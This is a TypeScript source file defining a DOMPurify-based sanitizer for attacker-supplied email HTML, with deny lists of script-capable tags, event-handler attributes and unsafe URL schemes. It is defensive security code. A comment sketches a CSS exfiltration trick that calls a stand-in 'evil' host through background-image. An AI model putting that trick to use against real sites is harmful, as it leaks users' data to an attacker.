// Shared HTML sanitizer used everywhere we render attacker-influenced HTML
// via `dangerouslySetInnerHTML` (inbox panel, email hub campaign preview,
// any future render path).
//
// We sit on top of `isomorphic-dompurify` (DOMPurify on the browser, JSDOM
// fallback on the server) and configure a tight allow-list so the new
// strict CSP can't be undermined by injected `<script>`, `on*=` handlers,
// or `javascript:` URLs in attacker-supplied HTML.

import DOMPurify from "isomorphic-dompurify";

// `style` is forbidden as an attribute because the strict CSP we set in
// server/middleware/security-headers.ts allows inline style attributes via
// `style-src-attr 'unsafe-inline'`, and we'd rather not give attacker-
// supplied HTML the ability to drop in arbitrary CSS (data exfil via
// background-image: url("https://evil/?...") tricks etc).
const FORBID_TAGS = [
  "script",
  "style",
  "iframe",
  "object",
  "embed",
  "form",
  "input",
  "link",
  "meta",
];

const FORBID_ATTR = [
  "onerror",
  "onclick",
  "onload",
  "onmouseover",
  "onmouseenter",
  "onmouseleave",
  "onfocus",
  "onblur",
  "onkeydown",
  "onkeyup",
  "onkeypress",
  "onsubmit",
  "onchange",
  "style",
];

// Allow http(s) and mailto URLs. Everything else (`javascript:`, `data:`,
// `vbscript:`, custom schemes) is stripped from `href` / `src`. This is the
// same regex shape DOMPurify ships in its default allow-list except we drop
// `tel:` and `data:` which we don't need for email rendering.
const ALLOWED_URI_REGEXP = /^(?:(?:https?|mailto):|[^a-z]|[a-z+.-]+(?:[^a-z+.\-:]|$))/i;

export function sanitizeEmailHtml(html: string | null | undefined): string {
  if (!html) return "";
  return DOMPurify.sanitize(html, {
    USE_PROFILES: { html: true },
    ALLOWED_URI_REGEXP,
    FORBID_TAGS,
    FORBID_ATTR,
  });
}
